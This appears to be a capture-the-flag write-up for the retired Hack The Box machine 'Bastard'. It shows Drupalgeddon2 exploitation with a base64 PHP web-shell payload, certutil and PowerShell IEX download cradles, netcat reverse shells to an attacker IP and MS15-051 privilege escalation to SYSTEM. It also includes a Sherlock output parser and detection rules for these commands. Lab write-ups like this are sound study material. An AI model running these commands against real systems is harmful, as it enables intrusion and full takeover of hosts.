BASTARD – HTB

RETIRED


NMAP

Nmap 7.91 scan initiated Fri Feb 12 23:36:02 2021 as: nmap -A -p- -T4 -oG nmap.init 10.129.29.109
Host: 10.129.29.109 () Status: Up
Host: 10.129.29.109 ()
Ports:
80/open/tcp//http//Microsoft IIS httpd 7.5/,
135/open/tcp//msrpc//Microsoft Windows RPC/,
49154/open/tcp//msrpc//Microsoft Windows RPC/
Ignored State: filtered (65532)
Nmap done at Fri Feb 12 23:38:42 2021 -- 1 IP address (1 host up) scanned in 160.81 seconds


EXPLOIT – Drupalgeddon2

─$ ./drupalgeddon2.rb http://10.129.29.109/
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.129.29.109/
--------------------------------------------------------------------------------
[+] Found  : http://10.129.29.109/CHANGELOG.txt    (HTTP Response: 200)
[+] Drupal!: v7.54
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo FLKXQCWI
[+] Result : FLKXQCWI
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://10.129.29.109/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Existing file   (http://10.129.29.109/sites/default/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (sites/default/)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Existing file   (http://10.129.29.109/sites/default/files/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (sites/default/files/)
[*] Moving : ./sites/default/files/.htaccess
[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
[!] FAILED : Couldn't find a writeable web path
--------------------------------------------------------------------------------
[*] Dropping back to direct OS commands
drupalgeddon2>> dir


WINDOWS UPLOAD (similar to wget)

certutil -urlcache -f http://10.10.14.10/nc.exe C:\inetpub\drupal-7.54\exploits\nc.exe

certutil -urlcache -f http://10.10.14.10/Sherlock.ps1 C:\inetpub\drupal-7.54\exploits\sherlock.ps1


REVERSE SHELL

drupalgeddon2>> nc 10.10.14.10 1337 -e cmd.exe


SHERLOCK – RUN THROUGH POWERSHELL

┌──(kali㉿kali)-[/mnt/…/RETIRED/Bastard/exploits/Drupalgeddon2]
└─$ nc -nvlp 1337
listening on [any] 1337 ...
connect to [10.10.14.10] from (UNKNOWN) [10.129.29.109] 49706
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
Not enough storage is available to process this command.

C:\inetpub\drupal-7.54\exploits>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:8000/Sherlock.ps1') ; Find-AllVulns"

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Not Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Not Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable
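The Sherlock report above is a series of plain "Key : value" records, with long Link values wrapped by the console onto indented continuation lines. The parser below is an added example of mine (not part of the original writeup or of Sherlock itself): it rebuilds the records, rejoins wrapped values and lists the bulletins marked "Appears Vulnerable" so the missing patches can be prioritised. The sample input is a constructed subset of the output above.

```python
import re

# Constructed sample (a subset of the Find-AllVulns output above), including a
# Link value that the console wrapped onto an indented continuation line.
SAMPLE_OUTPUT = """\
Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
             6-034?
VulnStatus : Not Vulnerable
"""

FIELD_RE = re.compile(r"^(\w+)\s*:\s?(.*)$")

def parse_sherlock(text):
    """Return one dict per 'Title' record in Sherlock's Find-AllVulns output."""
    records, current, last_key = [], None, None
    for raw in text.splitlines():
        if not raw.strip():
            continue                          # blank line between records
        if raw[0].isspace() and current is not None and last_key:
            current[last_key] += raw.strip()  # glue a console-wrapped value back on
            continue
        m = FIELD_RE.match(raw)
        if not m:
            continue                          # not a 'Key : value' line
        key, value = m.group(1), m.group(2).strip()
        if key == "Title":                    # a Title line starts a new record
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
            last_key = key
    return records

def flagged_bulletins(text):
    """(MSBulletin, [CVE ids]) for each record marked 'Appears Vulnerable'."""
    out = []
    for rec in parse_sherlock(text):
        if rec.get("VulnStatus") == "Appears Vulnerable":
            cves = ["CVE-" + c.strip() for c in rec.get("CVEID", "").split(",") if c.strip()]
            out.append((rec.get("MSBulletin", "N/A"), cves))
    return out
```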


EXPLOIT – MS15-051 – found with Sherlock.ps1

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

NOTE – GET A POWERSHELL INTERFACE


C:\inetpub\drupal-7.54\exploits>powershell -noprofile -
powershell -noprofile -
dir

    Directory: C:\inetpub\drupal-7.54\exploits

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         13/2/2021   8:50        55296 ms15.exe
-a---         13/2/2021   7:27        36528 nc.exe
-a---         13/2/2021   7:36       494860 PowerUp.ps1
-a---         13/2/2021   9:27        16663 sherlock.ps1
-a---         13/2/2021   8:40        69175 suggester.py
-a---         13/2/2021   8:26            0 win
-a---         13/2/2021   8:39        35107 winPEA
-a---         13/2/2021   8:05        35107 winPEAS.bat
-a---         13/2/2021   8:08            0 winPEAS.exe
-a---         13/2/2021   8:27            0 winPEAS32.exe


NOTE – BACKGROUND A NEW REVERSE SHELL

C:\inetpub\drupal-7.54\exploits>start "" nc.exe 10.10.14.10 1338 -e cmd.exe
start "" nc.exe 10.10.14.10 1338 -e cmd.exe

NOTE: start "" launches nc.exe as a separate process, so the current cmd.exe session stays usable while the new reverse shell runs
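From the defender's side, the commands used in this writeup (certutil -urlcache downloads, the PowerShell IEX download cradle, nc -e cmd.exe) all leave recognisable command lines in process-creation logs. The rules below are an added example of mine, not part of the original writeup; the events they scan are constructed, modelled on the commands above plus two benign certutil/powershell uses that must not fire.

```python
import re

# Each rule is (name, patterns); every pattern must match the command line.
# These cover the certutil download, PowerShell download cradle and netcat
# reverse shell seen in the writeup above.
RULES = [
    ("certutil_download",
     [r"\bcertutil(\.exe)?\b", r"-urlcache\b", r"https?://"]),
    ("powershell_download_cradle",
     [r"\bpowershell(\.exe)?\b", r"\biex\b|invoke-expression", r"downloadstring|downloadfile"]),
    ("netcat_reverse_shell",
     [r"\b(nc|ncat|netcat)(\.exe)?\b", r"\s-e\s+\S*cmd(\.exe)?\b"]),
]
COMPILED = [(name, [re.compile(p, re.I) for p in pats]) for name, pats in RULES]

# Constructed process-creation events (timestamp, user, command line) modelled
# on the commands above, plus two benign ones that must not match any rule.
SAMPLE_EVENTS = [
    ("2021-02-13T08:40:01", r"IIS APPPOOL\drupal",
     r"certutil -urlcache -f http://10.10.14.10/nc.exe C:\inetpub\drupal-7.54\exploits\nc.exe"),
    ("2021-02-13T08:41:10", r"IIS APPPOOL\drupal",
     r"nc 10.10.14.10 1337 -e cmd.exe"),
    ("2021-02-13T08:42:30", r"IIS APPPOOL\drupal",
     "powershell.exe \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:8000/Sherlock.ps1') ; Find-AllVulns\""),
    ("2021-02-13T08:50:05", r"IIS APPPOOL\drupal",
     r'start "" nc.exe 10.10.14.10 1338 -e cmd.exe'),
    ("2021-02-13T09:00:00", r"CORP\admin",
     r"certutil -hashfile C:\installers\setup.msi SHA256"),
    ("2021-02-13T09:01:00", r"CORP\admin",
     r"powershell.exe Get-Process | Sort-Object CPU"),
]

def classify(cmdline):
    """Return the names of all rules whose patterns all match the command line."""
    return [name for name, pats in COMPILED if all(p.search(cmdline) for p in pats)]

def scan_events(events):
    """Return a list of (timestamp, user, rule) for every event that matches a rule."""
    hits = []
    for ts, user, cmd in events:
        for rule in classify(cmd):
            hits.append((ts, user, rule))
    return hits
```

Process-creation events with the full command line (e.g. Sysmon Event ID 1 or Security 4688 with command-line auditing enabled) are the usual source for these rules.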


EXPLOIT – UPLOAD MS15-051

NOTE: set up a SimpleHTTPServer (default is port 8000)

C:\inetpub\drupal-7.54\exploits>certutil -urlcache -f http://10.10.14.10/ms15-051x64.exe C:\inetpub\drupal-7.54\exploits\ms15.exe
certutil -urlcache -f http://10.10.14.10/ms15-051x64.exe C:\inetpub\drupal-7.54\exploits\ms15.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

C:\inetpub\drupal-7.54\exploits>.\ms15.exe whoami
.\ms15.exe whoami
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 2492 created.
==============================
nt authority\system

NOTE: use netcat the same way to get a reverse shell as NT AUTHORITY\SYSTEM

PWN’D!
